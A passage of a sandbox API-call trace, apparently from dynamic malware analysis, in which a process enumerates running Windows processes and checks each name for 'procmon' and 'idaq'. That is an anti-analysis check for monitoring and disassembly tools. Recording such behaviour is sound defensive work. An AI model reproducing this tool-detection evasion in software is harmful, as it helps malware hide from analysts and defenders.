th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0083.069] StrStrIW (lpFirst="svchost.exe", lpSrch="procmon") returned 0x0 [0083.069] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0083.069] StrStrIW (lpFirst="OfficeClickToRun.exe", lpSrch="procmon") returned 0x0 [0083.069] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0083.069] StrStrIW (lpFirst="taskhost.exe", lpSrch="procmon") returned 0x0 [0083.069] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x560, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x314, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0083.070] StrStrIW (lpFirst="dwm.exe", lpSrch="procmon") returned 0x0 [0083.070] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x584, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x544, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0083.070] StrStrIW (lpFirst="explorer.exe", lpSrch="procmon") returned 0x0 [0083.070] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x600, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x35c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0083.071] StrStrIW (lpFirst="taskeng.exe", lpSrch="procmon") returned 0x0 [0083.071] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x35c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0083.071] StrStrIW (lpFirst="taskeng.exe", lpSrch="procmon") returned 0x0 [0083.071] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0083.071] StrStrIW (lpFirst="ONENOTEM.EXE", lpSrch="procmon") returned 0x0 [0083.071] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x258, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0083.072] StrStrIW (lpFirst="WmiPrvSE.exe", lpSrch="procmon") returned 0x0 [0083.072] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0083.072] StrStrIW (lpFirst="taskhost.exe", lpSrch="procmon") returned 0x0 [0083.072] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="undertake.exe")) returned 1 [0083.073] StrStrIW (lpFirst="undertake.exe", lpSrch="procmon") returned 0x0 [0083.073] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="luxury-westminster-editing-cube.exe")) returned 1 [0083.073] StrStrIW (lpFirst="luxury-westminster-editing-cube.exe", lpSrch="procmon") returned 0x0 [0083.073] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="devon stickers.exe")) returned 1 [0083.073] StrStrIW (lpFirst="devon stickers.exe", lpSrch="procmon") returned 0x0 [0083.073] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x724, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="eagles_podcast_type_marker.exe")) returned 1 [0083.074] StrStrIW (lpFirst="eagles_podcast_type_marker.exe", lpSrch="procmon") returned 0x0 [0083.074] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="groups.exe")) returned 1 [0083.074] StrStrIW (lpFirst="groups.exe", lpSrch="procmon") returned 0x0 [0083.074] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="filesdetectedlosebenjamin.exe")) returned 1 [0083.074] StrStrIW (lpFirst="filesdetectedlosebenjamin.exe", lpSrch="procmon") returned 0x0 [0083.075] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="cincinnati consumers se.exe")) returned 1 [0083.075] StrStrIW (lpFirst="cincinnati consumers se.exe", lpSrch="procmon") returned 0x0 [0083.075] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="simply_wa_thumbnail_programmers.exe")) returned 1 [0083.075] StrStrIW (lpFirst="simply_wa_thumbnail_programmers.exe", lpSrch="procmon") returned 0x0 [0083.075] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x848, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="medicaid.exe")) returned 1 [0083.076] StrStrIW (lpFirst="medicaid.exe", lpSrch="procmon") returned 0x0 [0083.076] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="gateway.exe")) returned 1 [0083.076] StrStrIW (lpFirst="gateway.exe", lpSrch="procmon") returned 0x0 [0083.076] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="laden.exe")) returned 1 [0083.077] StrStrIW (lpFirst="laden.exe", lpSrch="procmon") returned 0x0 [0083.077] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="lying-yourself.exe")) returned 1 [0083.077] StrStrIW (lpFirst="lying-yourself.exe", lpSrch="procmon") returned 0x0 [0083.077] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="disclaimer_saudi_agreed_oem.exe")) returned 1 [0083.077] StrStrIW (lpFirst="disclaimer_saudi_agreed_oem.exe", lpSrch="procmon") returned 0x0 [0083.077] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="colleague wrap.exe")) returned 1 [0083.078] StrStrIW (lpFirst="colleague wrap.exe", lpSrch="procmon") returned 0x0 [0083.078] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="hottest-jm-depression-fought.exe")) returned 1 [0083.078] StrStrIW (lpFirst="hottest-jm-depression-fought.exe", lpSrch="procmon") returned 0x0 [0083.078] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="saturday.exe")) returned 1 [0083.079] StrStrIW (lpFirst="saturday.exe", lpSrch="procmon") returned 0x0 [0083.079] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="WINWORD.EXE")) returned 1 [0083.079] StrStrIW (lpFirst="WINWORD.EXE", lpSrch="procmon") returned 0x0 [0083.079] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0083.079] StrStrIW (lpFirst="svchost.exe", lpSrch="procmon") returned 0x0 [0083.079] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OSPPSVC.EXE")) returned 1 [0083.080] StrStrIW (lpFirst="OSPPSVC.EXE", lpSrch="procmon") returned 0x0 [0083.080] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbe8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0083.080] StrStrIW (lpFirst="sppsvc.exe", lpSrch="procmon") returned 0x0 [0083.080] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0083.081] StrStrIW (lpFirst="svchost.exe", lpSrch="procmon") returned 0x0 [0083.081] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x65c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xa50, pcPriClassBase=8, dwFlags=0x0, szExeFile="iuoldw.exe")) returned 1 [0083.081] StrStrIW (lpFirst="iuoldw.exe", lpSrch="procmon") returned 0x0 [0083.081] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x65c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xa50, pcPriClassBase=8, dwFlags=0x0, szExeFile="iuoldw.exe")) returned 0 [0083.081] CloseHandle (hObject=0x148) returned 1 [0083.082] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x148 [0083.083] Process32FirstW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0083.083] StrStrIW (lpFirst="[System Process]", lpSrch="idaq") returned 0x0 [0083.083] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0083.084] StrStrIW (lpFirst="System", lpSrch="idaq") returned 0x0 [0083.084] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0083.084] StrStrIW (lpFirst="smss.exe", lpSrch="idaq") returned 0x0 [0083.084] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0083.085] StrStrIW (lpFirst="csrss.exe", lpSrch="idaq") returned 0x0 [0083.085] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0083.085] StrStrIW (lpFirst="wininit.exe", lpSrch="idaq") returned 0x0 [0083.085] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0083.085] StrStrIW (lpFirst="csrss.exe", lpSrch="idaq") returned 0x0 [0083.085] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0083.086] StrStrIW (lpFirst="winlogon.exe", lpSrch="idaq") returned 0x0 [0083.086] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0083.086] StrStrIW (lpFirst="services.exe", lpSrch="idaq") returned 0x0 [0083.086] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0083.087] StrStrIW (lpFirst="lsass.exe", lpSrch="idaq") returned 0x0 [0083.087] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0083.087] StrStrIW (lpFirst="lsm.exe", lpSrch="idaq") returned 0x0 [0083.087] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0083.087] StrStrIW (lpFirst="svchost.exe", lpSrch="idaq") returned 0x0 [0083.088] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0083.088] StrStrIW (lpFirst="svchost.exe", lpSrch="idaq") returned 0x0 [0083.088] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0083.088] StrStrIW (lpFirst="svchost.exe", lpSrch="idaq") returned 0x0 [0083.088] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0083.089] StrStrIW (lpFirst="svchost.exe", lpSrch="idaq") returned 0x0 [0083.089] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x35c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0083.089] StrStrIW (lpFirst="svchost.exe", lpSrch="idaq") returned 0x0 [0083.089] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0083.089] StrStrIW (lpFirst="audiodg.exe", lpSrch="idaq") returned 0x0 [0083.089] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0083.090] StrStrIW (lpFirst="svchost.exe", lpSrch="idaq") returned 0x0 [0083.090] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0083.090] StrStrIW (lpFirst="svchost.exe", lpSrch="idaq") returned 0x0 [0083.090] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x160, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0083.091] StrStrIW (lpFirst="spoolsv.exe", lpSrch="idaq") returned 0x0 [0083.091] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x418, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0083.091] StrStrIW (lpFirst="svchost.exe", lpSrch="idaq") returned 0x0 [0083.091] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0083.091] StrStrIW (lpFirst="OfficeClickToRun.exe", lpSrch="idaq") returned 0x0 [0083.091] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0083.092] StrStrIW (lpFirst="taskhost.exe", lpSrch="idaq") returned 0x0 [0083.092] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x560, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x314, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0083.092] StrStrIW (lpFirst="dwm.exe", lpSrch="idaq") returned 0x0 [0083.092] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x584, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x544, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0083.093] StrStrIW (lpFirst="explorer.exe", lpSrch="idaq") returned 0x0 [0083.093] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x600, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x35c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0083.093] StrStrIW (lpFirst="taskeng.exe", lpSrch="idaq") returned 0x0 [0083.093] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x35c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0083.093] StrStrIW (lpFirst="taskeng.exe", lpSrch="idaq") returned 0x0 [0083.093] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0083.094] StrStrIW (lpFirst="ONENOTEM.EXE", lpSrch="idaq") returned 0x0 [0083.094] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x258, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0083.094] StrStrIW (lpFirst="WmiPrvSE.exe", lpSrch="idaq") returned 0x0 [0083.094] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0083.095] StrStrIW (lpFirst="taskhost.exe", lpSrch="idaq") returned 0x0 [0083.095] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="undertake.exe")) returned 1 [0083.095] StrStrIW (lpFirst="undertake.exe", lpSrch="idaq") returned 0x0 [0083.095] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="luxury-westminster-editing-cube.exe")) returned 1 [0083.095] StrStrIW (lpFirst="luxury-westminster-editing-cube.exe", lpSrch="idaq") returned 0x0 [0083.095] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="devon stickers.exe")) returned 1 [0083.096] StrStrIW (lpFirst="devon stickers.exe", lpSrch="idaq") returned 0x0 [0083.096] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x724, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="eagles_podcast_type_marker.exe")) returned 1 [0083.096] StrStrIW (lpFirst="eagles_podcast_type_marker.exe", lpSrch="idaq") returned 0x0 [0083.096] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="groups.exe")) returned 1 [0083.097] StrStrIW (lpFirst="groups.exe", lpSrch="idaq") returned 0x0 [0083.097] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x584, pcPriClassBase=8, 